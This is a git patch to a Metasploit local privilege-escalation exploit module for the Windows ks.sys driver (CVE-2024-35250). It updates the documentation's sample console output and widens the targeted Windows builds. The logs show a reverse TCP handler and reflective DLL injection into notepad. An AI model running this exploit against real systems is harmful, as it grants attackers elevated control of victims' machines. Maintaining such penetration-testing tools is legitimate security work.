From 81b83f2fd6b274c44f584c281d8ad150713897c7 Mon Sep 17 00:00:00 2001 From: Jack Heysel Date: Wed, 6 Nov 2024 09:13:51 -0800 Subject: [PATCH] Updated docs and check --- .../windows/local/cve_2024_35250_ks_driver.md | 16 ++++++---------- .../windows/local/cve_2024_35250_ks_driver.rb | 2 +- 2 files changed, 7 insertions(+), 11 deletions(-) diff --git a/documentation/modules/exploit/windows/local/cve_2024_35250_ks_driver.md b/documentation/modules/exploit/windows/local/cve_2024_35250_ks_driver.md index a897526320f9..8773054e66a3 100644 --- a/documentation/modules/exploit/windows/local/cve_2024_35250_ks_driver.md +++ b/documentation/modules/exploit/windows/local/cve_2024_35250_ks_driver.md @@ -56,10 +56,8 @@ msf6 exploit(windows/local/cve_2024_35250_ks_driver) > rexploit [*] Reloading module... [*] Started reverse TCP handler on 192.168.123.1:5555 -[!] SESSION may not be compatible with this module: -[!] * incompatible session type: meterpreter. This module works with: . [*] Running automatic check ("set AutoCheck false" to disable) -[+] The target appears to be vulnerable. +[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows 10+ Build 19045 [*] Launching notepad to host the exploit... [*] The notepad path is: C:\Windows\System32\notepad.exe [*] The notepad pid is: 1012 @@ -85,7 +83,7 @@ msf6 exploit(windows/local/cve_2024_35250_ks_driver) > run [*] Started reverse TCP handler on 192.168.123.1:5555 [*] Running automatic check ("set AutoCheck false" to disable) -[+] The target appears to be vulnerable. Version detected: Windows 10+ Build 14393 +[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows 10+ Build 14393 [*] Launching notepad to host the exploit... [*] The notepad path is: C:\Windows\System32\notepad.exe [*] The notepad pid is: 4272 @@ -111,11 +109,9 @@ meterpreter > msf6 exploit(windows/local/cve_2024_35250_ks_driver) > run [*] Started reverse TCP handler on 192.168.123.1:5555 -[!] SESSION may not be compatible with this module: -[!] * incompatible session type: meterpreter. This module works with: . [*] Running automatic check ("set AutoCheck false" to disable) -[+] The target appears to be vulnerable. -[*] Launching notepad to host the exploit... +[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows 10+ Build 22621 +[*] Launching notepad to host the exploit... [*] The notepad path is: C:\Windows\System32\notepad.exe [*] The notepad pid is: 6948 [*] Reflectively injecting the DLL into 6948... @@ -142,7 +138,7 @@ msf6 exploit(windows/local/cve_2024_35250_ks_driver) > rexploit [*] Started reverse TCP handler on 172.16.199.1:5555 [*] Running automatic check ("set AutoCheck false" to disable) -[+] The target appears to be vulnerable. Version detected: Windows Server 2016+ Build 20348 +[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2016+ Build 20348 [*] Launching notepad to host the exploit... [*] The notepad path is: C:\Windows\System32\notepad.exe [*] The notepad pid is: 7336 @@ -169,7 +165,7 @@ msf6 exploit(windows/local/cve_2024_35250_ks_driver) > run [*] Started reverse TCP handler on 172.16.199.1:5555 [*] Running automatic check ("set AutoCheck false" to disable) -[+] The target appears to be vulnerable. Version detected: Windows Server 2016+ Build 14393 +[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2016+ Build 14393 [*] Launching notepad to host the exploit... [*] The notepad path is: C:\Windows\System32\notepad.exe [*] The notepad pid is: 316 diff --git a/modules/exploits/windows/local/cve_2024_35250_ks_driver.rb b/modules/exploits/windows/local/cve_2024_35250_ks_driver.rb index 8c316f4767ec..20201e968228 100644 --- a/modules/exploits/windows/local/cve_2024_35250_ks_driver.rb +++ b/modules/exploits/windows/local/cve_2024_35250_ks_driver.rb @@ -69,7 +69,7 @@ def target_compatible?(version) vprint_status("Windows Build Number = #{version.build_number}") return true if version.build_number.between?(Msf::WindowsVersion::Win10_1607, Msf::WindowsVersion::Win10_22H2) - return true if version.build_number == Msf::WindowsVersion::Win11_21H2 + return true if version.build_number == Msf::WindowsVersion::Win11_21H2 || version.build_number == Msf::WindowsVersion::Win11_22H2 return true if version.build_number.between?(Msf::WindowsVersion::Server2016, Msf::WindowsVersion::Server2022) false